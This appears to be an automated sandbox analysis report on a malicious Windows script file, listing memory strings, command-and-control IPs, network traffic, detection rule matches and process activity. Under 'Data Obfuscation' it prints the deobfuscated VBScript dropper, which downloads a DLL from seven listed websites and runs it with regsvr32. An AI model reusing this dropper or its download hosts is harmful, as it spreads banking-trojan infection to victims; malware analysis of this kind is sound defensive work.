        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://91.121.146.47:8080/
        Source: regsvr32.exe, 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000003.1868438531.0000000000D08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/X
        Source: regsvr32.exe, 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/dllgz
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/
        Source: wscript.exe, 00000001.00000003.1531992780.000002D8464BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552238532.000002D8464BB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/476
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/
        Source: wscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/95DC4.tmp.dll(
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/tM
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/
        Source: wscript.exe, 00000001.00000003.1531992780.000002D8464BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552238532.000002D8464BB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/cw34006
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM
        Source: wscript.exe, 00000001.00000003.1537553114.000002D84656F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542696917.000002D846570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1540601110.000002D846570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1534710579.000002D846568000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1545756551.000002D846570000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gomespontes.com.br/
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gomespontes.com.br/logs/pd/
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D84672F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gomespontes.com.br/logs/pd/0w
        Source: wscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gomespontes.com.br/logs/pd/l
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gomespontes.com.br/logs/pd/vM
        Source: wscript.exe, 00000001.00000002.1554710807.000002D846747000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gomespontes.com.br/s
        Source: unknown | HTTP traffic detected: POST /wfqhlvcfruxkwghn/ivirkxueekmcz/ HTTP/1.1 | Connection: Keep-Alive | Content-Length: 0 | Host: 164.90.222.65
        Source: unknown | DNS traffic detected: queries for: penshorn.org
        Source: global traffic | HTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: penshorn.org
        Source: global traffic | HTTP traffic detected: GET /useragreement/ElKHvb4QIQqSrh6Hqm/ HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: bbvoyage.com
        Source: global traffic | HTTP traffic detected: GET /logs/pd/ HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: www.gomespontes.com.br
        Source: unknown | HTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.3:49727 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 31.31.196.172:443 -> 192.168.2.3:49728 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 186.202.153.5:443 -> 192.168.2.3:49729 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 164.90.222.65:443 -> 192.168.2.3:49737 version: TLS 1.2

        E-Banking Fraud

        Source: Yara match | File source: 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 3.2.regsvr32.exe.460000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.regsvr32.exe.460000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.1501910088.0000000000460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: 00000001.00000003.1414548751.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1411114207.000002D845CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1413926742.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1410988197.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1411114207.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1533460578.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1533460578.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1412954439.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1542433572.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1414114730.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: C:\Windows\System32\regsvr32.exe | File created: C:\Windows\system32\BlUwZJEPejvMeG\
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180010AC0 ExitProcess,RtlQueueApcWow64Thread,NtTestAlert
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180010DB0 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject
        Source: click.wsf | Initial sample: Strings found which are bigger than 50
        Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
        Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\rad75349.tmp.dll 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
        Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\click.wsf"
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll
        Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll"
        Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32
        Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\Feedback
        Source: classification engine | Classification label: mal100.troj.evad.winWSF@5/8@3/54
        Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00738BC8 Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification
        Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: Window Recorder | Window detected: More than 3 window changes detected

        Data Obfuscation

        Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: wscript.scriptfullname)set request=createobject("winhttp.winhttprequest.5.1")set file=wscript.createobject("shell.application")set strout=createobject("adodb.stream")useragent="mozilla/5.0 (windows nt 6.1; wow64; rv:58.0) gecko/20100101 firefox/58.0"ouch= chr(115-1)+"e"+"gs"&"v"+chr(113+1)+"3"+"2."+chr(101)+"x"+chr(101)+" " + ""pat3= currentdir+"\"+fsobject.gettempname+".dll"loiu=ouch+ """"+ pat3 + """"set triplett=createobject("wscript.shell")url1 = "https://penshorn.org/admin/Ses8712iGR8du/"url2 = "https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/"url3 = "https://www.gomespontes.com.br/logs/pd/"url4 = "https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/"url5 = "http://ozmeydan.com/cekici/9/"url6 = "http://softwareulike.com/cWIYxWMPkK/"url7 = "http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/"docall dowloop while urlcount<8public function dow()on error resume nextselect case urlcountcase 1downstr=url1case 2downstr=url2case 3downstr=url3case 4downstr=url4case 5downstr=url5case 6downstr=url6case 7downstr=url7end selectrequest.open "get",downstr,falserequest.sendIf Err.Number<>0 thenurlcount=urlcount+1elsestrout.openstrout.type=1if vare=0 thencad=1elsefar=2end ifstrout.write (request.responsebody)if roum=0 thensio=sio+1elseend ifstrout.savetofile pat3strout.closearmour = "samcom."set fsobject=createobject("scripting.filesystemobject")Set f = fsobject.GetFile(pat3)GetFileSize = clng(f.size/1024)If GetFileSize > 150 Thencall roizeurlcount = 8elsepat3= currentdir+"\"+fsobject.gettempname+".dll"loiu=ouch+ """"+ pat3 + """"urlcount=urlcount+1end ifend ifend functionpublic function roizeif derti=0 thensem=sem+1elseend ifurlcount = 8triplett.run (loiu),0,truecor = "samo"set fsobject=createobject("scripting.filesystemobject")set textstream = fsobject.createtextfile(""+wscript.scriptfullname+"")textstream.write ("badum tss")if rotate = 12 thensable = 54 + 22elserouttt = "carry"end ifend function
        IHost.ScriptFullName();IFileSystem3.GetParentFolderName("C:\Users\user\Desktop\click.wsf");IHost.CreateObject("shell.application");IFileSystem3.GetTempName();IWinHttpRequest.Open("get", "https://penshorn.org/admin/Ses8712iGR8du/", "false");IWinHttpRequest.Send();_Stream.Open();_Stream.Type("1");IWinHttpRequest.ResponseBody();_Stream.Write("Unsupported parameter type 00000000");_Stream.SaveToFile("C:\Users\user\Desktop\rad95DC4.tmp.dll");_Stream.Close();IFileSystem3.GetFile("C:\Users\user\Desktop\rad95DC4.tmp.dll");IFile.Size();IFileSystem3.GetTempName();IWinHttpRequest.Open("get", "https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/", "false");IWinHttpRequest.Send();_Stream.Open();_Stream.Type("1");IWinHttpRequest.ResponseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\Desktop\rad1F9A4.tmp.dll");_Stream.Close();IFileSystem3.GetFile("C:\Users\user\Desktop\rad1F9A4.tmp.dll");IFile.Size();IFileSystem3.GetTempName();IWinHttpRequest.Open("get", "https://www.gomespontes.com.br/logs/pd/", "false");IWinHttp
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180005C69 push rdi; ret 3_2_0000000180005C72
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00000001800056DD push rdi; ret 3_2_00000001800056E4
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0073A0FC push ebp; iretd 3_2_0073A0FD
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_007480D7 push ebp; retf 3_2_007480D8
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00736CDE push esi; iretd 3_2_00736CDF
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00736C9F pushad ; ret 3_2_00736CAA
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00739D51 push ebp; retf 3_2_00739D5A
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00748157 push ebp; retf 3_2_00748158
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00747D4E push ebp; iretd 3_2_00747D4F
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00747D3C push ebp; retf 3_2_00747D3D
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00747D25 push 4D8BFFFFh; retf 3_2_00747D2A
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0073A1D2 push ebp; iretd 3_2_0073A1D3
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00747987 push ebp; iretd 3_2_0074798F
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0073A26E push ebp; ret 3_2_0073A26F
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00747EAF push 458BCC5Ah; retf 3_2_00747EBC
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_00739E8B push eax; retf 3_2_00739E8E
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0074C731 push esi; iretd 3_2_0074C732
        Source: rad75349.tmp.dll.1.dr | Static PE information: section name: _RDATA
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll
        Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\Desktop\rad75349.tmp.dll
        Source: C:\Windows\System32\regsvr32.exe | File created: C:\Windows\System32\BlUwZJEPejvMeG\xhwdmo.dll (copy)

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\System32\regsvr32.exe | File opened: C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll:Zone.Identifier read attributes | delete
        Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exe TID: 6476 | Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\regsvr32.exe TID: 6560 | Thread sleep time: -240000s >= -30000s
        Source: C:\Windows\System32\regsvr32.exe | API coverage: 8.5 %
        Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
        Source: C:\Windows\System32\regsvr32.exe | Process information queried: ProcessInformation
        Source: C:\Windows\System32\regsvr32.exe | Code function: 3_2_0000000180008D28 FindFirstFileExW
        Source: C:\Windows\System32\regsvr32.exe | File Volume queried: C:\ FullSizeInformation
        Source: wscript.exe, 00000001.00000003.1534710579.000002D846515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542609320.000002D846518000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1540392196.000002D846515000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW10p9pF
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D846703000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW&
        Source: regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW+
        Source: wscript.exe, 00000001.00000003.1546482854.000002D8467A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
